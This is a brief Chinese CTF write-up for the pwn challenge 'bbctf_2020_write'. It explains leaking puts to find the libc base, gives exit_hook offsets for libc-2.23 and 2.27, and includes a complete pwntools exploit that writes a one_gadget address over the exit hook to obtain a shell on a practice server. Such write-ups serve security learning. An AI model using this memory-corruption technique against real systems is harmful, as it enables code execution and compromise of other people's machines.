bbctf_2020_write

可以泄露了puts_got,可以算偏移，程序可以改地址的内容，那么可以改exit_hook,exit函数会执行run_exit_handlers，然后这个函数会调用_dl_fini，然后这个_dl_fini的源码调用了 rtld_lock_lock_recursive 和 __rtld_lock_unlock_recursive，所以只需要向其中一个写入one_gadget就行了。

为了以后方便，以后就这样算

在libc-2.23中
exit_hook = libc_base+0x5f0040+3848

exit_hook = libc_base+0x5f0040+3856

在libc-2.27中

exit_hook = libc_base+0x619060+3840

exit_hook = libc_base+0x619060+3848

具体的exit_hook可以看这，然后用one_gadget.然后输入的话得用字符串格式

exit_hook在pwn题中的应用](http://www.manongjc.com/detail/21-aktzmrsypltrrll.html))

from pwn import*
from LibcSearcher import *
p=remote("node5.buuoj.cn",29131)
#p=process("./bbctf_2020_write")
context.log_level="debug"
libc=ELF('./libc-2.27.so')
p.recvuntil('puts: ')
puts_addr=int(p.recv(14),16)
base=puts_addr-libc.sym['puts']

print('put'+hex(puts_addr))
p.sendline('w')

exit_hook=base++0x619060+3848
one=[0x4f2c5,0x4f322,0x10a38c]
one_gadget=one[1]+base
p.sendlineafter('ptr: ',str(exit_hook))
p.sendlineafter('val: ',str(one_gadget))

p.sendlineafter('(q)uit','q')

#gdb.attach(p)
#sleep(1)

p.interactive()